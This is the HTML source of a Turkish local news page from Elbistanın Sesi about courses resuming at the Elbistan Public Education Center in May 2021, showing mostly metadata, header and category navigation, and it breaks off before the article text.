  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Halk Eğitimi Merkezi’nde kurslar yeniden başladı</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Elbistan Halk Eğitimi Merkezi&#039;nde (HEM) açılan kurslarda yüz yüze eğitime yeniden başlandı." />
<meta name="keywords" content="Halk Eğitimi Merkezinde kurslar yeniden başladı" />
<meta name="news_keywords" content="Halk Eğitimi Merkezinde kurslar yeniden başladı">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" />
<meta property="og:description" content="Elbistan Halk Eğitimi Merkezi&#039;nde (HEM) açılan kurslarda yüz yüze eğitime yeniden başlandı." />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" />
<meta name="twitter:description" content="Elbistan Halk Eğitimi Merkezi’nde (HEM) açılan kurslarda yüz yüze eğitime yeniden başlandı." />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-05-18T17:48:21+02:00" />
<meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Halk Eğitimi Merkezinde kurslar yeniden başladı" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.3513</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">10.1937</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">501.819</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1460</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html" title="Hububat alım fiyatı belli oldu" >Hububat alım fiyatı belli oldu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html" title="İl genelinde 267 bin 500 doz aşı yapıldı" >İl genelinde 267 bin 500 doz aşı yapıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/hobisini-meslek-haline-donusturdu-h70064.html" title="Hobisini meslek haline dönüştürdü" >Hobisini meslek haline dönüştürdü</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html" title="Kaymakam Demir’den 19 Mayıs mesajı" >Kaymakam Demir’den 19 Mayıs mesajı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-israil-insanlik-ve-savas-sucu-isliyor-h70062.html" title="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”" >Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" title="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" >Halk Eğitimi Merkezi’nde kurslar yeniden başladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/bakkallar-odasindan-kadin-esnaflara-anneler-gunu-jesti-h70059.html" title="Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti" >Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanin-ilk-modern-serasinda-urun-cesitliligi-artiyor-h70055.html" title="Elbistan’ın ilk modern serasında ürün çeşitliliği artıyor" >Elbistan’ın ilk modern serasında ürün çeşitliliği artıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/yoresel-yemeklerimiz-ingilizce-kitapla-tanitilacak-h70054.html" title="Yöresel yemeklerimiz İngilizce kitapla tanıtılacak" >Yöresel yemeklerimiz İngilizce kitapla tanıtılacak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-irakta-mahsur-kalan-23-isciyi-ailelerine-kavusturdu-h70053.html" title="Ünal, Irak’ta mahsur kalan 23 işçiyi ailelerine kavuşturdu" >Ünal, Irak’ta mahsur kalan 23 işçiyi ailelerine kavuşturdu</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="ea826ce83986dd3172d4194e088874cdff4fb10d" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-serap-parmaksiz-h70057.html" title="Vefat - Teşekkür  / Serap Parmaksız"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/vefat_tesekkur_serap_parmaksiz_h70057_0f6a7.jpg" alt="Vefat - Teşekkür  / Serap Parmaksız" />
Vefat - Teşekkür  / Serap Parmaksız</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-bedevi-yelegen-h70056.html" title="Anma / Bedevi Yeleğen"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/anma_bedevi_yelegen_h70056_b75ea.jpg" alt="Anma / Bedevi Yeleğen" />
Anma / Bedevi Yeleğen</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html" title="Anma / Münevver Uluer, Fahri Uluer"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/anma_munevver_uluer_fahri_uluer_h70047_76d56.jpg" alt="Anma / Münevver Uluer, Fahri Uluer" />
Anma / Münevver Uluer, Fahri Uluer</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html" title="Müseyip Dal 82 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/museyip_dal_82_yasinda_h70046_e181d.jpg" alt="Müseyip Dal 82 yaşında" />
Müseyip Dal 82 yaşında</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html" title="Hububat alım fiyatı belli oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/hububat_alim_fiyati_belli_oldu_h70066_c9d55.jpg" alt="Hububat alım fiyatı belli oldu" />
Hububat alım fiyatı belli oldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html" title="İl genelinde 267 bin 500 doz aşı yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/il_genelinde_267_bin_500_doz_asi_yapildi_h70065_f13d6.jpg" alt="İl genelinde 267 bin 500 doz aşı yapıldı" />
İl genelinde 267 bin 500 doz aşı yapıldı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/hobisini-meslek-haline-donusturdu-h70064.html" title="Hobisini meslek haline dönüştürdü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/hobisini_meslek_haline_donusturdu_h70064_caa56.jpg" alt="Hobisini meslek haline dönüştürdü" />
Hobisini meslek haline dönüştürdü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html" title="Kaymakam Demir’den 19 Mayıs mesajı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/kaymakam_demirden_19_mayis_mesaji_h70063_66738.jpg" alt="Kaymakam Demir’den 19 Mayıs mesajı" />
Kaymakam Demir’den 19 Mayıs mesajı</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
